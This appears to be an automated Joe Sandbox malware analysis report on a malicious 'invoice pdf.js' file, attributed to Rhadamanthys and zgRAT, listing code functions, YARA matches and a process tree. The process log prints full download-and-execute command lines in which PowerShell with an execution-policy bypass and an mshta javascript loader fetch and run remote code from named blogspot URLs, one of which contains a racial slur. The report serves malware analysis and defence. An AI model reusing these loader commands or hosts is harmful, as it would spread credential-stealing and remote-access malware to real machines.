Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2299	7_2_02DE2299
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE0A8A	7_2_02DE0A8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE0A5F	7_2_02DE0A5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE3A5C	7_2_02DE3A5C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE3259	7_2_02DE3259
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2A4F	7_2_02DE2A4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE3277	7_2_02DE3277
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE1A68	7_2_02DE1A68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2260	7_2_02DE2260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE3A1B	7_2_02DE3A1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE0A19	7_2_02DE0A19
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE120F	7_2_02DE120F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE1A0D	7_2_02DE1A0D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE320B	7_2_02DE320B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2206	7_2_02DE2206
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE0A3C	7_2_02DE0A3C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE323B	7_2_02DE323B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2237	7_2_02DE2237
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2A2C	7_2_02DE2A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE13C7	7_2_02DE13C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2BC5	7_2_02DE2BC5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE23F4	7_2_02DE23F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE3BEC	7_2_02DE3BEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2BE8	7_2_02DE2BE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE33E5	7_2_02DE33E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE3B8A	7_2_02DE3B8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE238B	7_2_02DE238B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE23AE	7_2_02DE23AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2BA7	7_2_02DE2BA7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE0B5D	7_2_02DE0B5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE235B	7_2_02DE235B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2B59	7_2_02DE2B59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE3351	7_2_02DE3351
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE3B43	7_2_02DE3B43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE337F	7_2_02DE337F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE1372	7_2_02DE1372
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE1B71	7_2_02DE1B71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE1B10	7_2_02DE1B10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE0B0B	7_2_02DE0B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2B09	7_2_02DE2B09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE0B3F	7_2_02DE0B3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2338	7_2_02DE2338
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE1B33	7_2_02DE1B33
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2B27	7_2_02DE2B27
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE40CE	7_2_02DE40CE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE28C5	7_2_02DE28C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE20F8	7_2_02DE20F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE28E8	7_2_02DE28E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE30E9	7_2_02DE30E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2094	7_2_02DE2094
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2882	7_2_02DE2882
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE38B7	7_2_02DE38B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE28A5	7_2_02DE28A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE285F	7_2_02DE285F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE3846	7_2_02DE3846
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE3045	7_2_02DE3045
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2043	7_2_02DE2043
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE107E	7_2_02DE107E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE5078	7_2_02DE5078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE3864	7_2_02DE3864
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2063	7_2_02DE2063
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2017	7_2_02DE2017
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE3012	7_2_02DE3012
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE282E	7_2_02DE282E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE31DE	7_2_02DE31DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE21CA	7_2_02DE21CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE39F8	7_2_02DE39F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE21E8	7_2_02DE21E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE29E6	7_2_02DE29E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE299E	7_2_02DE299E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2198	7_2_02DE2198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE3999	7_2_02DE3999
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE1188	7_2_02DE1188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE39B7	7_2_02DE39B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2148	7_2_02DE2148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2166	7_2_02DE2166
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2967	7_2_02DE2967
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE1964	7_2_02DE1964
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE3919	7_2_02DE3919
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2906	7_2_02DE2906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE393C	7_2_02DE393C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE1932	7_2_02DE1932
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2924	7_2_02DE2924
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2ED8	7_2_02DE2ED8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE26C5	7_2_02DE26C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2E95	7_2_02DE2E95
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE0E84	7_2_02DE0E84
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2E53	7_2_02DE2E53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE0E50	7_2_02DE0E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE264D	7_2_02DE264D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE1E49	7_2_02DE1E49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE266B	7_2_02DE266B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE1E67	7_2_02DE1E67
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE1E17	7_2_02DE1E17
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE0E02	7_2_02DE0E02
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2E03	7_2_02DE2E03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE3638	7_2_02DE3638
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE1FDF	7_2_02DE1FDF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE37D4	7_2_02DE37D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE3FCB	7_2_02DE3FCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE27C1	7_2_02DE27C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE0FFE	7_2_02DE0FFE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE1FF7	7_2_02DE1FF7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE37F2	7_2_02DE37F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2FEF	7_2_02DE2FEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE27E4	7_2_02DE27E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE278F	7_2_02DE278F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE0F86	7_2_02DE0F86
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE374A	7_2_02DE374A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE0F68	7_2_02DE0F68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2F1C	7_2_02DE2F1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE1F14	7_2_02DE1F14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE273B	7_2_02DE273B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE0F20	7_2_02DE0F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE3CDE	7_2_02DE3CDE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE24D3	7_2_02DE24D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2CC0	7_2_02DE2CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE14F6	7_2_02DE14F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE34F4	7_2_02DE34F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE1CF2	7_2_02DE1CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE24F1	7_2_02DE24F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE1C86	7_2_02DE1C86
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE3485	7_2_02DE3485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2CA2	7_2_02DE2CA2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2C53	7_2_02DE2C53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE3C7B	7_2_02DE3C7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2476	7_2_02DE2476
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE1474	7_2_02DE1474
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE1C68	7_2_02DE1C68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE3462	7_2_02DE3462
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2C1A	7_2_02DE2C1A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE243F	7_2_02DE243F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2C35	7_2_02DE2C35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE1DCE	7_2_02DE1DCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE35C6	7_2_02DE35C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE5DC0	7_2_02DE5DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE1DF4	7_2_02DE1DF4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE35E9	7_2_02DE35E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2DE0	7_2_02DE2DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE1D92	7_2_02DE1D92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE5D90	7_2_02DE5D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2D84	7_2_02DE2D84
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE3D81	7_2_02DE3D81
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE3DB7	7_2_02DE3DB7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE25A5	7_2_02DE25A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE1558	7_2_02DE1558
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE3557	7_2_02DE3557
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2555	7_2_02DE2555
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE1D51	7_2_02DE1D51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE3D46	7_2_02DE3D46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE157B	7_2_02DE157B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE1D74	7_2_02DE1D74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE0D72	7_2_02DE0D72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2573	7_2_02DE2573
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE3D66	7_2_02DE3D66
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2514	7_2_02DE2514
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE1D15	7_2_02DE1D15
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE0D0D	7_2_02DE0D0D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2D06	7_2_02DE2D06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE2532	7_2_02DE2532
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DE1D33	7_2_02DE1D33
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A6AC20	7_2_05A6AC20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A63000	7_2_05A63000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A6440E	7_2_05A6440E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A68E79	7_2_05A68E79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0621A070	7_2_0621A070

Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: 1.2.powershell.exe.18a31d882e8.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 1.2.powershell.exe.18a31d882e8.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report invoice-1623385214 pdf.js

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Rhadamanthys

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
invoice-1623385214 pdf.js

Source: 1.2.powershell.exe.18a20f80000.0.raw.unpack, jM6m4u9DWikmOWShtE6.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1.2.powershell.exe.18a313ece00.1.raw.unpack, jM6m4u9DWikmOWShtE6.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1.2.powershell.exe.18a31d882e8.2.raw.unpack, bymALRf1lpiBkvXQPs.cs	Cryptographic APIs: 'CreateDecryptor'

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-7033c19e-5841-2ad059-6fd8187c45ce}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:928:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1016:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6880:120:WilError_03

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\invoice-1623385214 pdf.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://7janmain.blogspot.com/////lund.pdf);Start-Sleep -Seconds 5;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 932
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 800
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 932
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 776
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE "javascript:zre=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) \| . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSystemObject']; new ActiveXObject(zre[2])[zre[0]](zre[1], 0, true);close();mgm=new ActiveXObject('Scripting.FileSystemObject');mgm.DeleteFile(WScript.ScriptFullName);"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) \| . iex;Start-Sleep -Seconds 3;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
